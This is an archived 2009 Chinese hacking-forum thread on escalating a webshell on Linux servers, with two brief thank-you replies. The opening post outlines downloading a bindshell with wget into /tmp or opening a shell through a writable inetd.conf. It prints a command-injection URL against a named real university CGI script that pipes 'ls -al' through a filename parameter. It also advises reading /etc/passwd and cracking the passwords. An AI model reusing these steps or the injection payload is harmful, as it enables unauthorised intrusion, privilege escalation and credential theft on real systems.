【3.A.S.T】网络安全爱好者's Archiver

黑客学习

dsa3027235 发表于 2009-5-24 19:20

webshell 提升 for linux

我在zone-h得到了答案,他们是这样干的
用wget把bindshell下载到/tmp/目录下
或者再/etc/inetd.conf可写的情况下直接开一个交互的shell
然后用gcc编译
[url]http://cgiserver.sogang.ac.kr/~gsviscom/cgi-bin/technote/main.cgi/shop.pdf?down_num=5466654&board=rebarz99&command=down_load&filename=rb9.txt[/url]|ls%20-al|
ls -al显示文件

||中间的是显示的命令
很简单的办法是得到用户

最基本的办法是得到用户列表然后用流光跑密码

.... etc/passwd?

EndTo偌枫 发表于 2009-5-27 09:38

好强大 学习了 .em66.

柔肠寸断 发表于 2009-5-27 10:10

谢谢你的帖子

页: [1]

Powered by Discuz! Archiver 7.2  © 2001-2009 Comsenz Inc.